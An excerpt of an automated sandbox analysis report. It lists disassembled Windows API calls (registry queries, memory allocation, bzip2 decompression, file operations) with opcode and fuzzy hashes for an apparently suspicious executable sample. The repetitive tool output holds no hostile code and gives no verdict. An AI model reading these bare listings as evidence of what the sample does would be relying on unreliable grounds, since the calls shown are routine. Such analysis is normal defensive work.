                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileNext
                                                                          • String ID:
                                                                          • API String ID: 2066263336-0
                                                                          • Opcode ID: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
                                                                          • Instruction ID: 9ec0e3c397c6f5708f2a232916c112a37fe27e538a562d44e8698fe4f4711445
                                                                          • Opcode Fuzzy Hash: ce33a9adc91091840db89c3f0b9d0ab62a3048a172c241aa17054621e5542f77
                                                                          • Instruction Fuzzy Hash: AA81B37090424D9FCF11EF65C8417EFBBB4AF4934AF1480AAE84067392D3399B4ACB58
                                                                          APIs
                                                                          • GetACP.KERNEL32(?,?,00000001,00000000,0047CC8B,?,-0000001A,0047EBEA,-00000010,?,00000004,0000001A,00000000,0047EF37,?,0045D288), ref: 0047CA22
                                                                            • Part of subcall function 0042E244: 73A0A570.USER32(00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 0042E253
                                                                            • Part of subcall function 0042E244: EnumFontsA.GDI32(?,00000000,0042E230,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E27E
                                                                            • Part of subcall function 0042E244: 73A0A480.USER32(00000000,?,0042E2A3,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E296
                                                                          • SendNotifyMessageA.USER32(00020464,00000496,00002711,-00000001), ref: 0047CBF2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A480A570EnumFontsMessageNotifySend
                                                                          • String ID:
                                                                          • API String ID: 2685184028-0
                                                                          • Opcode ID: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
                                                                          • Instruction ID: fce8b5d73ed99f1e2ef66d4a8ce886950ac346dadb3b378a3b6f7676f451f25a
                                                                          • Opcode Fuzzy Hash: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
                                                                          • Instruction Fuzzy Hash: 585172346001048BC720EF26E9C668B3799EB54309B50C57FB8489B7A7C73CED468B9E
                                                                          APIs
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DB64
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DBD4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID:
                                                                          • API String ID: 3660427363-0
                                                                          • Opcode ID: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                          • Instruction ID: dfb8c8f379aef3e71039058fa16673b54f7d2a66c5b8750361213b9ce9dda202
                                                                          • Opcode Fuzzy Hash: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                          • Instruction Fuzzy Hash: E6416371E04129AFDB11DF96D881BAFB7B8EB44704F91846AE800F7244D778EE00DB95
                                                                          APIs
                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DE94
                                                                          • RegCloseKey.ADVAPI32(?,0042DF05,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DEF8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEnum
                                                                          • String ID:
                                                                          • API String ID: 2818636725-0
                                                                          • Opcode ID: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
                                                                          • Instruction ID: 371203d48d58dd12687a59eda9429109c9bfccb849147f5bab4b3e409d052118
                                                                          • Opcode Fuzzy Hash: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
                                                                          • Instruction Fuzzy Hash: F431D570F04648AEDB11DFA6DD42BBFBBB8EB49304F91407BE500B7280D6789E01CA19
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,00600000,00002000,00000001,?,?), ref: 0045CF34
                                                                          • BZ2_bzDecompressInit._ISDECMP(?,00000000,00000000,?,?,?,00000000,00600000,00002000,00000001,?,?), ref: 0045CF7A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocDecompressInitVirtualZ2_bz
                                                                          • String ID:
                                                                          • API String ID: 3582128297-0
                                                                          • Opcode ID: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
                                                                          • Instruction ID: 1a4503516ee109fc6ad3b2554e9268a8a2595667017840414d64b8ef7de05fed
                                                                          • Opcode Fuzzy Hash: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
                                                                          • Instruction Fuzzy Hash: D0110872600700BFD310CF258982B96BBA6FF44751F044127E908D7681E7B9A928CBD8
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                                          • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindFree
                                                                          • String ID:
                                                                          • API String ID: 4097029671-0
                                                                          • Opcode ID: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
                                                                          • Instruction ID: 91321923317e208a88a5ae6d58faa7c91e6d3ee961cd2f37f7af0eb3e2dea987
                                                                          • Opcode Fuzzy Hash: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
                                                                          • Instruction Fuzzy Hash: A401DFB1300604AFD710FF69DC92E5B77A9DB8A7187118076F500AB6D0DA7AAC1096AD
                                                                          APIs
                                                                          • MoveFileA.KERNEL32(00000000,00000000), ref: 00452322
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00452348), ref: 0045232A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastMove
                                                                          • String ID:
                                                                          • API String ID: 55378915-0
                                                                          • Opcode ID: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
                                                                          • Instruction ID: cd5642aef6cf07d7f8e9267465b44b1c19008dc4a29441b527747bf004e73304
                                                                          • Opcode Fuzzy Hash: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
                                                                          • Instruction Fuzzy Hash: 0301F971B04744BBCB00DFB99D415AEB7ECDB4932575045BBFC08E3252EA7C5E088598
                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E09
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E11
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1375471231-0
                                                                          • Opcode ID: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
                                                                          • Instruction ID: 865e03444c10a102779f68a5f284ef85491b61924e311ce2fbbb44c68c5af0ec
                                                                          • Opcode Fuzzy Hash: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
                                                                          • Instruction Fuzzy Hash: 03F0C871A04604ABCB10DF759C4269EB7E8DB49315B5049B7FC04E7652E63D5E088598
                                                                          APIs
                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451F9F
                                                                          • GetLastError.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451FA7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 2018770650-0
                                                                          • Opcode ID: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
                                                                          • Instruction ID: 56c29436b3704a60aac7ef2d45938277689dd37fb147f6dcc6f0601c7006ef02
                                                                          • Opcode Fuzzy Hash: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
                                                                          • Instruction Fuzzy Hash: 59F0C872A04644ABCB00DF75AC416AEB7E8DB4831575149B7FC04E3262E7385E189598
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452179
                                                                          • GetLastError.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452181
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 1799206407-0
                                                                          • Opcode ID: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                          • Instruction ID: 62be775e20b856c612f09eeab74c149225b5b58071cf0ad503393caa7686f059
                                                                          • Opcode Fuzzy Hash: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                          • Instruction Fuzzy Hash: 2BF02870A04B08ABDB10DF759C414AEB3E8EB4572571047B7FC14A3282D7785E088588
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0045CEF2), ref: 0045D046
                                                                          Strings
                                                                          • bzlib: Too much memory requested, xrefs: 0045D021
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID: bzlib: Too much memory requested
                                                                          • API String ID: 4275171209-1500031545
                                                                          • Opcode ID: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
                                                                          • Instruction ID: abed268314e6f1e5b27342288b91a972118d83a3dc427804377a042ebfa3a805
                                                                          • Opcode Fuzzy Hash: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
                                                                          • Instruction Fuzzy Hash: 87F030327001114BDB6199A988C17DA66D48F8875EF080476AF4CDF28BD6BDDC89C36C
                                                                          APIs
                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                                          • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CursorLoad
                                                                          • String ID:
                                                                          • API String ID: 3238433803-0
                                                                          • Opcode ID: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                          • Instruction ID: 4bac6b1dd1e4bc4155aef89283820d70f6b19f6d084946fd63ee35bdac132fa3
                                                                          • Opcode Fuzzy Hash: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                          • Instruction Fuzzy Hash: 0BF05C11700110ABDA105D3E6CC0E2A7268DB82B36B6103BBFE3AD32D1CA2E1D01017D
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLibraryLoadMode
                                                                          • String ID:
                                                                          • API String ID: 2987862817-0
                                                                          • Opcode ID: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
                                                                          • Instruction ID: 1f7e49cd896e1bdba9cb1c47732ae581670473b421036b970d27c02fb23a5fd1
                                                                          • Opcode Fuzzy Hash: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
                                                                          • Instruction Fuzzy Hash: ACF05E70614744BEDB029F679C6282ABAECE74DB1179248BAF800A7691E63D58108928
                                                                          APIs
                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,?,00000000), ref: 0044FF6E
                                                                          • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,?,00000000), ref: 0044FF76
                                                                            • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$FilePointer
                                                                          • String ID:
                                                                          • API String ID: 1156039329-0
                                                                          • Opcode ID: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
                                                                          • Instruction ID: 1dbdaa83cb3dbbf4f1378df278a55a8d47ec78cb15146b3f417e0b56a3c3e3df
                                                                          • Opcode Fuzzy Hash: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
                                                                          • Instruction Fuzzy Hash: E2E012B13056015BFB00EAA599C1F3B22D8DB49314F10487BB544CF182E674CC098B65
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 2087232378-0
                                                                          • Opcode ID: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                          • Instruction ID: b33c25bc9d44e5855224c25112d8485d4e2e4d0ac397fdc44bd3a0d1e7be2c31
                                                                          • Opcode Fuzzy Hash: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                          • Instruction Fuzzy Hash: 3BF08272A0063067EB60596A4C85B5359C49BC5794F154076FD09FF3E9D6B98C0142A9
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                                            • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
                                                                            • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                                                          • String ID:
                                                                          • API String ID: 1658689577-0
                                                                          • Opcode ID: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                          • Instruction ID: 93f846491c188cfa0342f854d2ed9f3c57c1d7a82097d89a8732084db8b3b420
                                                                          • Opcode Fuzzy Hash: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                          • Instruction Fuzzy Hash: 11314375E001199BCF00DF95C8819DEB7B9FF84314F15857BE815AB286E738AE058B98
                                                                          APIs
                                                                          • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: InfoScroll
                                                                          • String ID:
                                                                          • API String ID: 629608716-0
                                                                          • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                          • Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
                                                                          • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                          • Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                                          APIs
                                                                            • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                            • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                          • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046B526,?,00000000,?,?,0046B733,?,00000000,0046B772), ref: 0046B50A
                                                                            • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
